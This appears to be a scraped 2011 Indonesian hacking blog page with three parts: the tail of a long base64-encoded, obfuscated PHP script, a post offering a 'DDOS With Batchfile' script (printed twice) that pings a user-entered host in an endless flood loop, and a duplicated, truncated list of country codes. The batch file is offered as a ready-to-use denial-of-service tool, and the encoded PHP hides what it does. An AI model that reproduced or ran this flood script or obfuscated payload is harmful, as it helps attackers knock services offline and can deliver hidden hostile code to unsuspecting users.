J0Ht996GXALscgLgfLW50tf3rSlviB1BxRMFm76VCNrci5ceHFJKPf+lGjedX2zQVLT+lKlZGP6/8oGcYNKOHv27HzNYbFXFZtVBkk3FxWwXnxle615vrTudT74+5W97RNak7I1VKzbhaB933kyRonCrDbukeH7397eXhSSVxg0wur6fytK0yf5cmCGrG52Qpbz5poaCr9IU7X2IaQ5nW2rr/H/mqpVpLt0TWXecEenkBUdb9juesMnNmVNcSKcNgvpis5NUqjhYtXXVFpeChIrq6kr6WR0zPjgEBKQO4Wob9w51u+YAVM7pOuPGlmsa8f10tizlzHnQU7VNWmO7MwHkisrHNQxvLgTYeyomoaCjyTZEx+Jp4GxlKEb0wJ3NvHsfBVI0zzN8Pnf4VRm5OuuQikWjHwxrXeLRtLdyzkW9D3bCuybTj5H4gnIFXIUa7HuIBpOiXShBJbqhdLvF9FKlqwhJBVw+uQlcEhGUy/mVtNHhaC93BNPD+dB/QUOlsGxie+7GeASnm6+dj+4eojZvv7yUUdqG4J3fDh/ZoKuvGvZQoTd4DNHjJjFPoTMuNzoxLP7mdmG6FlXa5MiaVJh0KSCW7nSxHmoVuysDNDMyUI9kl21oLt3x/jp3pwHdDmBif1H/+SczhY75fs+S9SC9ByJS38TAnjmE5wfbcYnIxb1u1xFXGKFUGyWGZ8B/WxMNg2ryILrKBZvEuvWh2MkA5bmpZgvEipxZsFQiNvJdInLbjnntnKIwoddEWI/mpmD4Ap4hJBfKbma5UOzKS36zKklh+sO7KaH4znYA7fWuMTLOTcfoV8WdZ0t9rtHCKdsvt1SXVshd2frXMgpmFB0XWcuLv29KTix7tle/byjOjTjupQaOfGxPOaRAzDmtLd3lthMoTc2UeUHB5jWYKkmFSCiwBUJXk/ht53kUtm59V3UOThhWmImlYIRwVXZhTkFNvZYo9JWRtGT4/u9EsGI3JRQQwlet3EOROKMa5cWKcY2BsYRg5hTYx2DKD++uGQXp2lVGzI9PvV9A6gZ83j/QPyn1bb5o97tJ4710FVaxQn5s75bfRbh+vaVsRk7MMEzecWxHTJBfTtryfQo6f1Oa9mV1s+LAm8wQ7iTyQt3CIi10S6zPsdQzO8dobjX28mQBfZAwPSnBv8OZsfNwfeJS8h4f1+HDiCrNa+wzPu+3UbVlJKctzpO6g0TRTdq6BQepeBDy81o1yrunUmkwJymUzod02tx947Qm/reVamVq0CEFyaUsSZkb1StpxuKkch7mXInVESw9zkgr5tnXvVB7ay1Yopi1RzFijshNEetGSq9ZO/sxveHcLQhNjcF6/sWKWlqRxiTySmMgL1MlaAY2hLnpI3/PH5K3e/BV2PP2rLUuS9KhEAQig+RQxWX6vypshVeF6qAjBmzRwmV2V993YFWWUxmNGUpK4Z6VKxaqwErbecOlWIpsWrYXSWrhNo21KZPIibawePZLWqlL/rueie8k67frW+nrJqyhXbELwuC3MzLUMeEb44yxYlJ9VKcJ1FmHJW28oziC/cqI+rRKkIkyhSNrqo8nELLHiXeM3hHDr79wrbTPO+rId8WQixLsv+zApuGUzXpD0+k95+6d0gwXXqHBNIVYsVwVoGbomLf495kjM0oSKKDkrDjAwYBI+1JjPq+tP0GStOJKF1elYUllVMNxQXNP5yAiYmicj6vKUF1H3LOSNI3bWqeZuVRbF9UqKPTmL11ZK2tykZUlq1PQrqRsKtnAKtBaWxo/6FAgzF9WG5jSD1C0FkJ7aZJOcOtfuwODN3LgRhIRsuEyiqAX470pWXyR5dCVevLAbF/bjlJ46y5DmcQXxpHko8f+JteT+gC4rDIOxkERa4uJEyYkpPWOWI8klQEyr5NYtpve6+KF1HYMU2bKhSjBDIuuKqbKfRE1j3DyDoQsBpG0xMs1QIwT9fFiBIUmfm2rgfVWi2bgcwcpMS9ccyqja9RZjJXQXogvpICvTRq6A+XkFmAYguhdmcymMdL5LYDjNJphwICtNHz9W4xdabYo73s2m5i6n9YqA8R430PoZ2hXAoJB6ui2fQVsilLx+bEv6qquG1+MB0mdOqCXPtAV9zGTQ5OBHHvQ0jGOgp6w3EqGjm/Sj7uFT3zfph9+1ImUaFBrWFy4KJy3Y2IYTx8cxTZJVjepXU2F0krv2DLTNZ/iflqeh5UkDSxo4cFblTV5nZnbjBq78cccNZVcWZEh6CLN7Us1lbjMdpEYKETzbmt6HWqSQgeeWlQSgz6qmrbheCiy9AsSqJFN83hy1ugBReIRYJD9QMG8lPiwPgfW9sgItWqsLnWJFp12SuaBr6ykuG7Tk6Uc9a/csj+aJjn3geP6aGpd6+BeeTttBWJpt82yJJ75wBrSlZjwW+Np/U1ykaj6ouylH0t8ifESy+beqhRLUt3f/N8aIlJfZyovtKFIov27GtIoqjpXFV46WFml0B39PMf567EYx3ip8o0kgPASJJS2Fa3/6Xq+1sWHV9O20iuysC7R5qz1BbUkfcu4cpX3jbKQLxadBGN7WajWm+xiTGjZ3QDVbmusWjJSRftSHlOLJbVI5lpzVctcZKVEl8SE0rxmhUzemQvW1lqxZKZo2pQSEsgwFIPemXly26JaodEsCmpt63aql4i1elC8Gjy8qF1HtR/RmBuGHdSlSWbcrpTrCzG/J6ctgUilKnoiJZurhtTkx1LFsqUi9Sseup+rx3xMACsGeYzmXLu9pS8ph5S1D+7XdNlYXI1F5eRbedZ5TMBdIUEusdw7domS3QAjBFK2H7rKjUVr9Za8sKraTU3Hre7cYPnqpat1QhcKQYhgmhMePq0hxImUxYxuLZsPiM9wMQ9Hm28TYBVMcZVltokpuCsVTclb2vSjGEHSr0dj8L9O4Bzz/4Ibc/C8TeZgMqAfT+uS/TOt7Y6SxsoWBzi09/rqiW9jtLCX/qU5+Qzfuoi/NwhoJq6KDMJjkWhalqimv/qvrYrLAcRasgqEp7RjxUpysrL36Ik/SF65omlY8USdbE79hFURCRXNAi9sC5rssElrj7pFvECHETZTJ6fh/wUSb29YotWJ/WOtPhE4PpRc5LcspeMdD0+OsAxesex/ODtafweKnm0zDtF5i2iraoFV0atXE7Xy6DJQyn1Y2W1oEEWut9mN/cBE9Lp//n63Lx5XSmlU1xWYRPOTR10RG4kGVZOgQ7bg8dYllmy6Bgeeyoee2dJVrv6ZsAdOu3Ja9ZaWOfXMaNyAeEmYfhAYbNslcmAPE7cD3z4KZHjQknfyaNshbZpdlV83vNEfXHMFUTBIMcO9NB8Gitn+NQSKYeOs7M5g+XPoYlelP7Zf9314efzpCVNdOyIDfIhESapdrk2yVNA+FZkONlKtZWeyeEAAVH6mCnzO3xq9dasHTlXuLUZTF6Oeak2dS3J6H6+uSy+Cl065zESV3NKCACJSeA+Cl6XkOX7iCRuy0ZEF4UZssSGhweEFsm1CJQDPfWianPXUhFQy+MmThBVMhs2DGe52/zaMxAZhfhLqOt7dG23qDT1Vqu2eZYpaYsVaIvt0fmhG382ccWKRoE3phV74WDZs2BtXeys9PScaKdYctwk8rJuqsYkUnBC1HgbOBDsHSW1rdqcDxPScS92vJM1o1gVCiG4mgVFPhVJAEX7gmExc7dVtH+tr69bx1aQprwDqugurOerE5M2Lw3mkLouHAkKtkuaa9Nb/ZSzkwfE9I+O9yObFz3SW4bVxy1I1coLMMNbnGDkZaIVcUYsiyRzGopYsn/3th1fG6kORMxAw/T+UHRph187L6+hYXkODBopDSwdS/XSVQeP5piLWykJCJnJ57HqIdOE4GqRqgSFffSszm9ZoEU1gv0HawbeE6QwvKlmXKc5rdY+ZQVsxFQ3iPYNI1T8Lul//eBiNodCH+pcP4Ffc532iTSrd3667ZhRoq1x+euOgJz4sQEnE6Ht8tzEQVaTQpFEEPUXmI9QzJOcXrgdE+m/VcdwqMgoUP7FTkFt6yvCTm4oVTa3bi5W7Qt5bQp11xU6ACmHt9r/hmCNg9+f4tWzjTGD0wOW0sHrv8UuPntPFabjNzgbSQfcxvrgi29QBp/0U4j13gpr6bH8Q/xzo2DOIgY+uHdT1xo7kfR8UR/nFbSAaeSwzg0sUkhm90XeIqWSOC5KFR1MkD3R5n4iZGG8YzZbCZuJX0sFkOqFlK3qxawqvUqiU/GOFl3LjPTQR4cVAbz+SNeJSDUZbn9LvVbOimGHQwm7pfkzCFpJEkVFQSP5gVpTJerDqgxfLSh+LKvZ5fEyo3ATKqam796ebB72sBQTe/w1BrhBpM+zW9HTY36z8VVUjk5lUK3eh76jQbfXed8IqzNrPweinaIHm4PWKYgV7xAT/grU70gZAQCCpBYJLnYPCCHwc9rkjgNytGVqrHk9sYybtTtQl+X7VBSISJ5tzyUR7ElpwYt1Kx9oUPDnh3b/hVXlbLSo7y1NBRF6qKBB7pBlu3oSyX5W6c7LTMa/byFOi0xUvpz/lXkjhh4tVOpOg1QyXByEOnx49V9ZJT57LeyTuituf1y6p6xsCdhAi/qif9nF61ozrxTq43y9W7SBwoifY6rXtA9APtO83XSjZ16KJXtXYx3iMVYtCyFEEpczKJH/ZKjNuSMd2YTGDAI34BSQf9MjWnKb+lLWPqYC08fU5DfndLxskBUSbGvTk3ZHm3mc+7EnDgUeiav4x5+e3ED2TawnYWRNJMY8uG/y6+NTHex74FvJtWNAkTbFFJtV4nU5FYzjmpSbqgPXGws1JSNnopnL3nTUUSS6GgoWueszFlB5okottp2FgHqCMBaLtmWllSEZJg+UViCuIn0VrWoct9CyBoherIm3Z1MLWPzOipJX33RM3K3S2nHIRp67wcnbOChYOzGiozAtcyhEkoLh2tLv7hwlvUabl7L7HeibIbzX/W6vBfw9IaWOHQuYMEY0JWVBxpPIxSQ2fgBcJoAL2gZKEWE/vgjn5Qsr0hMBQSoo4lCFBuIYUR07rvDuNWg65IK96/i8VEbeEVITKhTKOfrXfY1BsFfuWhVK3SAE2rw156JIM54e0DSuB2XEvqbXTZW6zJg5iD111QiRcs38sWejUeUBCuLA8an5xFapDPyrPsEuVl5ojck6y886iCYGiZQyM1469ge/KHL/aQNB2zl709+kvLE+rJyadvS73hTjt5k+KsQiqy8yu35FlKCRWe6x3hY5ggvDOyKmEaxXdYKFFKF/sNvCWHhHFhiSLtYBK8sih5Qxvtj1raWi1gSVGQ3fZQkbxEXiD5LDC141NHYKbNtrwPa6SXRsg0IRgtFRh9rGjCwxp9wVMlJp/aT59sNreKadY2HHyL85XnrF/e8T3OV4npjm9xqELJ3oZqJnc1okGt+yt5p8fITba+Zufx9W/QKwNeKds8uJdYWfQLx9YV6Cp/AX1/zN3wlu/TiqljS6iTGzgObmyeNdyr8kguNuhfgSrp92oR2pVqTXe1l5X4zMvB1O50PgEheRSVK8/pHY/54L1cr7QSora+pRsFSaJtiIIu8F3QN/bDq7YQNsoqOFZqDrR6edmLyt/IoEtYADEDu0Z61+VcnLIyL4gXzg7W6f7b/b0zDCJPRqwHJ8fvGLQLvDtoxGVVirxJVmiPM1xB/tImMWi3T18ff2Jnuy/e7p/af12LCEmflj+6+YENw2BCdzSjbSq6vUcgNE2cGoFEbDF20U6HZ+BJpBHO5rDZ7tFLlgHEyRfaG2QPu8KCUC+ap0ZjZxAs7G/uDNJef2c/CG7kqL6dFXHQwSoer4RoxeUh3uO7hPvm4HvW8UyAT7lgxF25DUmMns1W0WCIiCrLqZhhFJ3i5P0ztvd69wT/2rVvme6xXYkK38PwCmQqD7KxMd+z75rw5U2539PK5ujjS0jufPT2ePclHd2UebRDablDZdcsGCdOREZxVmVVBjTL4Zf38dkDD2ua5BVPwcoqW3vH73+jj3w+zCdhS0wUlI+mCMyxZSWXMYVt7dqSxB+r5LWNBkiYqhTSHQol75zHD09ulDK4ZRAGMyZu24Eik8siRfMK7ydC0e54E6EwRUuaUlj51nGGrlnQWVjsN/Z+qXASN3rjXzACqJia/a+kbiVxwXGbGas/V8bpKzc3subQ6ExjbV1ME+egzMAjdvuRd3R+ybLXxPXDZtdpurZ+4M8n09RtNeZdX4SDQjTipYGGYhSTxNVeFjCcmFjwYsCuG/WdGawYFK5PRGq0tItMRcHEO9a/eAjHf1kZlSjfxR0ene6fnLHDo7Njo76sbNcUq1QZKtcFXth8VtjH3bcf9k9zgHiULWgtW7OWzrvf9/5BmeoNSdz/bkfoI39py5euVmjxpMH/4+29ZFDf8TuWesK+TW2sDfX4qkGMVohCBEWtd9SGWJ4sAXvjnlJ3HCN5V6mztY+4vUx/Q/lUxW3BEpKNYgHUw4Mh4aRXAzRWPgIenAgXjY2Z73hTAZa+aDvu+cKK6lrM9UQvn1GvKyvF2bX+529kPvCHz3phsIDdd3FsOT3cbTS0zRhzuVEwm5komKRBwlvdBkIvLvRIrwGHehEKNvH2XmgD1IeXYheRKKEM/RRgv0fXDLXtFMHMpAm3TbOHXQzY7Nx/scSq90r8xy6VELdWZA4b+GjMXBzBD+m1axd2zNHbljA8sKuIHuwOUHXH+WnpcYQ8MccCcpHz9GLk955kiKrmq+jF1KC3pmm8lUwelee2H/Qdn95axSYgSQbRkasQoauDC6iQZ2XPbVQX30OBBH4ACaRYW0oBnxvzwxTnwGllY8n8vj1xmlxMBg5jSUYSd9hkcb2NlZXof3LqT8uhmaFmaN2sT2SRHa03mk8bVouJNUPtHu3+DFNgaWUZscUiN4K8TPN4+Cw/yy/Hh8/WT/LyXAXes3BJpg9Fmeb5mfqzZz/9lF8jSEjlEcHzEFQprTSXWsuYfWRjp6cHu5OKEZ4WzhB9WjTD4uiGa+hMcWN2myXymOHfkLX45VnwdjC8e0wYZmeZ4nkyGwkb0ySraRacjmEhZidbsz1WHso4QGh1lnt446uMBEvD+RHFOF5y4JIENZbxjGXwSn7kQs/JZbG6qiMux1Vftacy8IyGtVlD2eaLBpDH8gZUU0HFiQGav9ZGw8GKAbmpIP0cRDL2pt6Oikwv0fnl3WsL2dWFsiganV/al/J228ePlYXKUnjzutq1VWE1ck3fgWQuwzOGH35gYnxMrypfNUsGbp2s3XOLprqGJNU05Ki6HB1Z82N9GvuqCYX3CrGPUvdtCUJk8F/Nnrg5u2FR4HsD9veffvppS6SEFK0ilWZLEwhSaUobDBkTTZmnQYtiELBIjnBdy7ulx5zJmQdUZm2vtuKMwEOJ6Ljw0dw07h1/ODor/0iKoanaQIqBb1cSVJKtczwIuCm8vnmztqcBNoIe4FbdqCwFNGKzZI0WhcIiKy6iypjrXlhQbR0SY9gmrxSargzv03N7ilbnle0NTkYmjLWkMp8+FVkbRyT0McvxRRBkv8TAO0mGvEmDAvaKW+KsrdzZIJEr7mdHW1XF2GRKe28xiem3rxuRd4XUr7p1VY4wPPs19dJ0nl630knwh/ojxSA0UtIu+dKIqYy5KszSbn1X1z9R2sZmvcIvKtbM7EoengtkorxVTJO5/CDqwFkYMT0VIYA0BxgnvUpBeCpVzmSJLkPXTXP0EjAByljQJfuA5Kp6IzRYVqNjND97e/ju8Ixt1tnxwQHXfRvxSX7ExslTni8t5V/pYv4lysnBXrOrm3U71aP5Iw1qn8OmnAtpyciLxKKxb8KgO7kxzaSwjNPrWlv4ExkWn17su7qjkW7Pl7soqWUovUTx2IyON02M95SNYkN9WSLSPUoUZmRwQLTpX5ObYrUichVw7i33LKPJN4FUCMYowAEUWbeMDWzQVLhkG0uFaqm2fqavhyrjygcdj6x6M/l2lzZPjUPpkO0DPZiBLNI0ZaBAQn/b7cbzZitpynsrrmkguXMdX6XajCSznGZBAbODidsbnrA50iurD2c9k12b+s1eWC5a/eSNn/aSptgwmu8uxYlmrKnMJRJajFC8IHcfjwFbaGaa68CBPCdOL9MxOU17U2Pwpq4AgmGWvZdka8zDdjXwmgS8QGKn2POEAk0ZN/yQIFgo4O/fuP05XlppmRKb0n5Zmf2HlbrWhJdghkqw8wR+WJVxRUaNZWpVVus2vxuHv+Sv25mLp7j1nAg8IRczUWF5pxEFBz+cgtiQ0hcM7937qJtbilZ/WSVbc6vxaPbjcqc6i8wJ7JIfkTfvGmbAIE/azCgJSXz0++MlpIzejtx4EYRX+c5TJQyCKy2turO2dXi7fz34fHT7tvlm1vN+Xnz5/CZ6+eus0W9+GH1o/vy70/xYP17Uf3nzyh9/eXVy+/6TP//y+WT42+eT6543uvr145vXH/1o8fn0ajR8vRh9eeX7v+y9OehP31z3fw9Gb/YO+j3vcEY4Xr/gOD4fXf/WjOn5c9Of/7J38uLD1eDTpz8PBm/3dq+cTwdXX14fzg5f3zw7fHUy+3I68k4+v7ntbR7+dLj36/jzqyfeL2fR0Z53suhPfq73/mxMgSb+3HzztDc5iCHPdPDqaPHm9uqfUJ8/e82j8MvnX4MP9Z9fntY/fni79+LXE//nN2dX9Hx2Vj96+7lx9OHD1ccXZ6eLEdAK5Z1c/3L64tlw7wXQ9CE4vPp4C2XcHnu7V4cfb+aHHuH+vdd8Ov/y6aj+y8HR+1/r8cHHPcpP9Vsh/3X/1cc55P1wsu8fQ/29994Xoufk46+8nhPol09Pgg+Nk/2zBtK7HObk45vTXJjp0dP+5onfg7YR/f2ns7cbO6d96p/fmjfX0O+E4/TDk8w3LJuXdRT1No98TvPH0w9QD67Fwxsfu2iuV8xawdWH+vjgbH/x86H3s+d8egLoR6O3n648LM759Nvol/0XxA6HLxejd8BW7u0L333l1395uT87vn3xcx579sXzLwfvojf+i1ef6/4xVBueqUuGQP7pyYeDo7evBv5AdO1vU3/+26cGsOug/tvm7vQXjYUP9968/O3T0/rhq6PbL58O6l9OXwgWOkF2JpaCZ/rW23xB5QJrvQMWEixwc3bW+Pn05OPHMyh3/+TgMIK6YD6o89MrhOc0I6u/GUI7BG/2D05PGl967w7q0emHpy+gI08/1w+OP51eaUNh1/u1eTAf7L0gtjl8DX+niqbI+XxUJza4Xfypsd7o8Opo3Jv+Ouq98v8cZPNtOq/8CIbMDeSB9+DNb5+Ofv/yGeq1f/T+7OpJ9IGGUfAG+ic4PB1d9V/5V+8/fbnuT6KZzLP3KaGvB0Px8BWle4ev/Mnh3giGw8cJ1N3/AkMc8xMrja7eQPv5Pe/F2cf9kzdn3sJ7v/fl5Vn96fHh75n09x+hTw9/fzL5tf7z8RnRjuUS648S1j98/OaK6Cae2vvVB/75+Pvh3snZ6f7Hd2d7Sbv0XwNvQrtwfKptCX7w+cRXeQ5guAp6xJDgecS3L5/Hs8He7oLK+1yHoVZvW5pmbtzoiHl5+ZUWeKu3dnY2Hc60SyIvDC9buzeb2SIyEfr+FVw5R/eEk/sAjE0ypUW33g0YqRvRmJ3P3NC/TLQtGwj/Hj0jWeFVT4hDaRs2G5ub/0xt7LMLLhLB19wHVbAvK8hdJoxgTCtVGRa7dbHYsfy6CieO4toK/0PtBCTxNj/Zf3d8tt/dffnyBMQGVLiw/2TbqT1h5uBDDyWQ2JxjxOVqKVYmsou2jN48pODXaOq3k71VGkMgAj0qBKIe23mhtlgqRPaiumPc1VyGEjNRmxfpq19yXeyRoyW1QL21EU9mG71ZbeZbVX1tkTGUgznaovNwCBb2LktysLQKgjU6GwP3egN5izU7PzTYD5Z57mAKbIg9ibZgzSLmzG/Yv9kodGeME0UyOcps1tbyevXz6tUX9TIksvuq1s+tmmVc/PdX17VfUNdvEk9P9rRr6ndyon2WHOMK8UfWnGz5cas6G8+69FauVHkafhE3/koI8apAgCADBEYuBo4QqRhLkkJJYtIOBpIc4bmVCjHJNUt6eCg3BAGeLq9x9Gt4uJYexm3ORT3UDtmLVhx5X4qm/OcBsLu8rUirk72Onl5tBjNRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='\x29\x29\x29\x3B",".");?>
written by ejam at 12:48 am
Make a comment Permalink
DIY Distributed Denial Of service
Thursday, November 03, 2011
@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS With Batchfile
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
save as.bat
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS With Batchfile
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
save as.bat
written by ejam at 03:23 am
Make a comment Permalink
ID Codes Setiap Negara
Thursday, November 03, 2011
Afghanistan --> AF
Albania --> AL
Algeria --> DZ
American Samoa --> AS
Andorra --> AD
Angola --> AO
Anguilla --> AI
Antarctica --> AQ
Antigua and Barbuda --> AG
Argentina --> AR
Armenia --> AM
Aruba --> AW
Australia --> AU
Austria --> AT
Azerbaijan --> AZ
Bahamas --> BS
Bahrain --> BH
Bangladesh --> BD
Barbados --> BB
Belarus --> BY
Belgium --> BE
Belize --> BZ
Benin --> BJ
Bermuda --> BM
Bhutan --> BT
Bolivia --> BO
Bosnia and Herzegovina --> BA
Botswana --> BW
Bouvet Island --> BV
Brazil --> BR
British Indian Ocean Territory --> IO
Brunei Darussalam --> BN
Bulgaria --> BG
Burkina Faso --> BF
Burundi --> BI
Cambodia --> KH
Cameroon --> CM
Canada --> CA
Cape Verde --> CV
Cayman Islands --> KY
Central African Republic --> CF
Chad --> TD
Chile --> CL
China --> CN
Christmas Island --> CX
Cocos (Keeling) Islands --> CC
Colombia --> CO
Comoros --> KM
Congo --> CG
Congo, Democratic Republic --> CD
Cook Islands --> CK
Costa Rica --> CR
Cote d'Ivoire --> CI
Croatia --> HR
Cyprus --> CY
Czech Republic --> CZ
Denmark --> DK
Djibouti --> DJ
Dominica --> DM
Dominican Republic --> DO
East Timor --> TL
Ecuador --> EC
Egypt --> EG
El Salvador --> SV
Equatorial Guinea --> GQ
Eritrea --> ER
Estonia --> EE
Ethiopia --> ET
Falkland Islands (Malvinas) --> FK
Faroe Islands --> FO
Fiji --> FJ
Finland --> FI
France --> FR
French Guiana --> GF
French Polynesia --> PF
French Southern Territories --> TF
Gabon --> GA
Gambia --> GM
Georgia --> GE
Germany --> DE
Ghana --> GH
Gibraltar --> GI
Greece --> GR
Greenland --> GL
Grenada --> GD
Guadeloupe --> GP
Guam --> GU
Guatemala --> GT
Guinea --> GN
Guinea-Bissau --> GW
Guyana --> GY
Haiti --> HT
Heard and McDonald Islands --> HM
Honduras --> HN
Hong Kong --> HK
Hungary --> HU
Iceland --> IS
India --> IN
Indonesia --> ID
Iraq --> IQ
Ireland --> IE
Israel --> IL
Italy --> IT
Jamaica --> JM
Japan --> JP
Jordan --> JO
Kazakhstan --> KZ
Kenya --> KE
Kiribati --> KI
Kuwait --> KW
Kyrgyzstan --> KG
Lao People's Democratic Republic --> LA
Latvia --> LV
Lebanon --> LB
Lesotho --> LS
Liberia --> LR
Libya --> LY
Liechtenstein --> LI
Lithuania --> LT
Luxembourg --> LU
Macau --> MO
Macedonia --> MK
Madagascar --> MG
Malawi --> MW
Malaysia --> MY
Maldives --> MV
Mali --> ML
Malta --> MT
Marshall Islands --> MH
Martinique --> MQ
Mauritania --> MR
Mauritius --> MU
Mayotte --> YT
Mexico --> MX
Micronesia --> FM
Moldova --> MD
Monaco --> MC
Mongolia --> MN
Montserrat --> MS
Morocco --> MA
Mozambique --> MZ
Namibia --> NA
Nauru --> NR
Nepal --> NP
Netherlands --> NL
Netherlands Antilles --> AN
New Caledonia --> NC
New Zealand --> NZ
Nicaragua --> NI
Niger --> NE
Nigeria --> NG
Niue --> NU
Norfolk Island --> NF
Northern Mariana Islands --> MP
Norway --> NO
Oman --> OM
Pakistan --> PK
Palau --> PW
Palestinian Territory --> PS
Panama --> PA
Papua New Guinea --> PG
Paraguay --> PY
Peru --> PE
Philippines --> PH
Pitcairn --> PN
Poland --> PL
Portugal --> PT
Puerto Rico --> PR
Qatar --> QA
Reunion --> RE
Romania --> RO
Russian Federation --> RU
Rwanda --> RW
Saint Kitts and Nevis --> KN
Saint Lucia --> LC
Saint Vincent and the Grenadines --> VC
Samoa --> WS
San Marino --> SM
Sao Tome and Principe --> ST
Saudi Arabia --> SA
Senegal --> SN
Serbia and Montenegro --> CS
Seychelles --> SC
Sierra Leone --> SL
Singapore --> SG
Slovakia --> SK
Slovenia --> SI
Solomon Islands --> SB
Somalia --> SO
South Africa --> ZA
South Georgia and The South Sandwich Islands --> GS
South Korea --> KR
Spain --> ES
Sri Lanka --> LK
St. Helena --> SH
St. Pierre and Miquelon --> PM
Suriname --> SR
Svalbard and Jan Mayen Islands --> SJ
Swaziland --> SZ
Sweden --> SE
Switzerland --> CH
Taiwan --> TW
Tajikistan --> TJ
Tanzania --> TZ
Thailand --> TH
Togo --> TG
Tokelau --> TK
Tonga --> TO
Trinidad and Tobago --> TT
Tunisia --> TN
Turkey --> TR
Turkmenistan --> TM
Turks and Caicos Islands --> TC
Tuvalu --> TV
Uganda --> UG
Ukraine --> UA
United Arab Emirates --> AE
United Kingdom --> GB
United States --> US
United States Minor Outlying Islands --> UM
Uruguay --> UY
Uzbekistan --> UZ
Vanuatu --> VU
Vatican --> VA
Venezuela --> VE
Viet Nam --> VN
Virgin Islands (British) --> VG
Virgin Islands (U.S.) --> VI
Wallis and Futuna Islands --> WF
Western Sahara --> EH
Yemen --> YE
Zambia --> ZM
Zimbabwe --> ZW
Albania --> AL
Algeria --> DZ
American Samoa --> AS
Andorra --> AD
Angola --> AO
Anguilla --> AI
Antarctica --> AQ
Antigua and Barbuda --> AG
Argentina --> AR
Armenia --> AM
Aruba --> AW
Australia --> AU
Austria --> AT
Azerbaijan --> AZ
Bahamas --> BS
Bahrain --> BH
Bangladesh --> BD
Barbados --> BB
Belarus --> BY
Belgium --> BE
Belize --> BZ
Benin --> BJ
Bermuda --> BM
Bhutan --> BT
Bolivia --> BO
Bosnia and Herzegovina --> BA
Botswana --> BW
Bouvet Island --> BV
Brazil --> BR
British Indian Ocean Territory --> IO
Brunei Darussalam --> BN
Bulgaria --> BG
Burkina Faso --> BF
Burundi --> BI
Cambodia --> KH
Cameroon --> CM
Canada --> CA
Cape Verde --> CV
Cayman Islands --> KY
Central African Republic --> CF
Chad --> TD
Chile --> CL
China --> CN
Christmas Island --> CX
Cocos (Keeling) Islands --> CC
Colombia --> CO
Comoros --> KM
Congo --> CG
Congo, Democratic Republic --> CD
Cook Islands --> CK
Costa Rica --> CR
Cote d'Ivoire --> CI
Croatia --> HR
Cyprus --> CY
Czech Republic --> CZ
Denmark --> DK
Djibouti --> DJ
Dominica --> DM
Dominican Republic --> DO
East Timor --> TL
Ecuador --> EC
Egypt --> EG
El Salvador --> SV
Equatorial Guinea --> GQ
Eritrea --> ER
Estonia --> EE
Ethiopia --> ET
Falkland Islands (Malvinas) --> FK
Faroe Islands --> FO
Fiji --> FJ
Finland --> FI
France --> FR
French Guiana --> GF
French Polynesia --> PF
French Southern Territories --> TF
Gabon --> GA
Gambia --> GM
Georgia --> GE
Germany --> DE
Ghana --> GH
Gibraltar --> GI
Greece --> GR
Greenland --> GL
Grenada --> GD
Guadeloupe --> GP
Guam --> GU
Guatemala --> GT
Guinea --> GN
Guinea-Bissau --> GW
Guyana --> GY
Haiti --> HT
Heard and McDonald Islands --> HM
Honduras --> HN
Hong Kong --> HK
Hungary --> HU
Iceland --> IS
India --> IN
Indonesia --> ID
Iraq --> IQ
Ireland --> IE
Israel --> IL
Italy --> IT
Jamaica --> JM
Japan --> JP
Jordan --> JO
Kazakhstan --> KZ
Kenya --> KE
Kiribati --> KI
Kuwait --> KW
Kyrgyzstan --> KG
Lao People's Democratic Republic --> LA
Latvia --> LV
Lebanon --> LB
Lesotho --> LS
Liberia --> LR
Libya --> LY
Liechtenstein --> LI
Lithuania --> LT
Luxembourg --> LU
Macau --> MO
Macedonia --> MK
Madagascar --> MG
Malawi --> MW
Malaysia --> MY
